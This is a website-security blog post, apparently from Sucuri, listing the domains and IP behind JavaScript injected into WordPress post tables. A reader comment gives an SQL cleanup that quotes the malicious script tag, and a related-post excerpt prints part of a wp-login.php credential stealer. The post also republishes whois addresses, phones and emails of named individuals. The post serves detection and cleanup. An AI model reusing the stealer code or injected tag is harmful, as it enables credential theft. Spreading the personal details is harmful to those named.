Website Malware Infections

Malware update – Alex Bodrov – awaue.com,etc

We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the domains being used:

http://aeaaea.com/ou
http://secree.com/re
http://uoauer.com/si
http://oeooea.com/ve
http://secowo.com/wo

Those were used in the first batch of attacks that happened a few weeks (months) ago:

http://ae.awaue.com
http://ie.eracou.com
http://ao.euuaw.com

Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3

For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).

Whois details:

Name: Alex Bodrov
Address: Polubotka 19-10
City: Chernigov
Province/state: Chernigov region
Country: UA
Postal Code: 34586
Phone: +48.7139123463
Fax: +48.7139123463
Email: alexbodrovqw@gmail.com

Name: Alexandr Borisenko
Address: Polubotka 81-38
City: kiev
Province/state: Kiev region
Country: UA
Postal Code: 45675
Email: 3807345466632@gmail.com

We will post more details as we learn them.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags

Malware Updates

4 comments

Pingback: Tweets that mention Malware update – Alex Bodrov – awaue.com,etc | Sucuri -- Topsy.com
guy says:
August 31, 2010 at 12:53 pm
guys, this is a 2 months old thing 😛
Crysfel says:
August 31, 2010 at 4:12 pm
To fix this problem, run the following code in your database:
UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')
Best regards
Pingback: Malware update – seconeo.com,secowo.com,etc | Sucuri

Comments are closed.

Backdoor plugin hides from view

Luke Leal
July 24, 2019

One of the most important traits for backdoors is the ability to remain undetected by most users — otherwise it may draw suspicion and be…

Read the Post

Tiny WSO Webshell Loader

Luke Leal
March 24, 2020

A PHP webshell is a common tool found on compromised environments. Attackers use webshells as backdoors, allowing them to maintain unauthorized access to a hacked…

Read the Post

Simple WP login stealer

Luke Leal
July 28, 2019

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post

Yet Another Expired Domain causes WP Plugin to Redirect Users

Krasimir Konov
June 20, 2017

Malicious redirects are very common in compromised websites. Attackers try to take advantage of the site resources to promote spam, distribute other malware/backdoors, and perform…

Read the Post

Backdoor using paste site to host payload

Bruno Zanelato
November 30, 2017

Over the last months, we’ve been talking a lot about new ways to decode complex malwares that involve the usual PHP functions like eval, create_function,…

Read the Post

“Loader for Secured Files” and arrayed b374k shell encoding

Luke Leal
July 27, 2019

This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use…

Read the Post

Vulnerabilities Digest: April 2020

John Castro
May 1, 2020

Relevant Plugins and Vulnerabilities: Plugin Vulnerability Patched Version Installs Widget Settings Importer/Exporter Stored XSS Closed 40000 Accordion Stored/Reflected XSS 2.2.9 30000 Support Ticket System By…

Read the Post

Malicious Curl Downloader

Krasimir Konov
June 2, 2020

If you want to easily download and save remote files, curl is an excellent command-line tool for Windows and Unix. It supports HTTP, HTTPS, and…

Read the Post

Fake License.txt File Loaded Through PHP Include

Luke Leal
April 3, 2020

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which includes a file inconspicuously named…

Read the Post

New Wave of SocGholish cid=27x Injections

Denis Sinegubko
November 23, 2022

On November 15th, Ben Martin reported a new type of WordPress infection resulting in the injection of SocGholish scripts into web pages. The attack loads…

Read the Post

Related Tags

4 comments

Related Categories

You May Also Like